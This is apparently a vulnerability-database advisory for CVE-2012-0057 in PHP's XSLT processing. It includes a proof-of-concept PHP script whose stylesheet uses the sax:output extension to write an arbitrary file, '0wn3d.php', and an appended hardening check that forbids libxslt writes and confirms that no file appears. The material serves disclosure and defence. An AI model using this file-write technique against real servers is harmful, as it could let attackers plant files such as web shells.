PHP: XSLT file writing vulnerability (CVE-2012-0057)

2012-02-03T00:00:00
ID SSV:30072
Type seebug
Reporter Root
Modified 2012-02-03T00:00:00

Description:
------------
The current version of PHP5 allows the creation of arbitrary files when processing XSLT content. This was tested on the following releases:
- PHP 5.3.2-1ubuntu4.7 with Suhosin-Patch (cli) (built: Jan 12 2011 18:36:08) 
- PHP 5.3.6 (cli) (built: Apr  1 2011 11:26:17)

The problem lies in the unrestricted use of libxslt. The attached patch will forbid some operations like the creation of files or directories, by calling the libxslt security API.



Test script:
---------------
<?php 

$sXml = '<xml><foo>Hello from XML</foo></xml>';
 
$sXsl = <<<EOT
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:sax="http://icl.com/saxon"
	extension-element-prefixes="sax">

	<xsl:template match="//foo">
		<sax:output href="0wn3d.php" method="text">
			<xsl:value-of select="'0wn3d via PHP and libxslt ...'"/>
			<xsl:apply-templates/>
		</sax:output>
	</xsl:template>

</xsl:stylesheet>
EOT;

# LOAD XML FILE 
$XML = new DOMDocument(); 
$XML->loadXML( $sXml ); 

# LOAD XSLT FILE 
$XSL = new DOMDocument(); 
$XSL->loadXML( $sXsl );

# START XSLT 
$xslt = new XSLTProcessor(); 
$xslt->importStylesheet( $XSL ); 

# TRANSFORM & PRINT
print $xslt->transformToXML( $XML ); 

?>

Expected result:
----------------
The file isn't created and PHP displays some warnings:

Warning: XSLTProcessor::transformToXml(): runtime error: file /somewhere/ line 7 element output in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): File write for 0wn3d.php refused in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): runtime error: file /somewhere/ line 7 element output in /somewhere/simple_xslt.php on line 34
Warning: XSLTProcessor::transformToXml(): xsltDocumentElem: write rights for 0wn3d.php denied in /somewhere/simple_xslt.php on line 34


Actual result:
--------------
The file '0wn3d.php' is created.
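
Hardening check (added example, not part of the original report or the attached patch): the script below runs the report's stylesheet with libxslt write operations forbidden from PHP and verifies that nothing appears on disk. It assumes a PHP build that provides XSLTProcessor::setSecurityPrefs() and the XSL_SECPREF_* constants; the function name and the scratch directory are hypothetical.

```php
<?php
// Added example, not from the original report. Assumes a PHP build where
// XSLTProcessor::setSecurityPrefs() and the XSL_SECPREF_* constants exist.
function transformWithWritesForbidden($xml, $xsl, $workDir)
{
    $xmlDoc = new DOMDocument();
    $xmlDoc->loadXML($xml);
    $xslDoc = new DOMDocument();
    $xslDoc->loadXML($xsl);

    $proc = new XSLTProcessor();
    // Ask libxslt to refuse file writes, directory creation and network writes.
    $proc->setSecurityPrefs(
        XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY | XSL_SECPREF_WRITE_NETWORK
    );
    $proc->importStylesheet($xslDoc);

    // Collect warnings so the refusal messages can be logged or checked.
    $warnings = [];
    set_error_handler(function ($no, $msg) use (&$warnings) {
        $warnings[] = $msg;
        return true;
    }, E_WARNING);
    $before = scandir($workDir);
    $cwd = getcwd();
    chdir($workDir); // assumption: a relative href resolves against the cwd
    $output = $proc->transformToXML($xmlDoc);
    chdir($cwd);
    restore_error_handler();
    $created = array_values(array_diff(scandir($workDir), $before));
    return ['output' => $output, 'warnings' => $warnings, 'created' => $created];
}

// The XML and stylesheet from the report's test script.
$xml = '<xml><foo>Hello from XML</foo></xml>';
$xsl = <<<'EOT'
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:sax="http://icl.com/saxon" extension-element-prefixes="sax">
	<xsl:template match="//foo">
		<sax:output href="0wn3d.php" method="text">
			<xsl:value-of select="'0wn3d via PHP and libxslt ...'"/>
		</sax:output>
	</xsl:template>
</xsl:stylesheet>
EOT;
$workDir = sys_get_temp_dir() . '/xslt-check-' . getmypid(); // scratch dir (hypothetical name)
mkdir($workDir);
$result = transformWithWritesForbidden($xml, $xsl, $workDir);
print_r($result['warnings']);
echo empty($result['created']) ? "OK: no file created\n" : "FAIL: file created\n";
```

Run it from the CLI against the PHP build that serves the application; a "FAIL" line means stylesheets processed by that build can still write files.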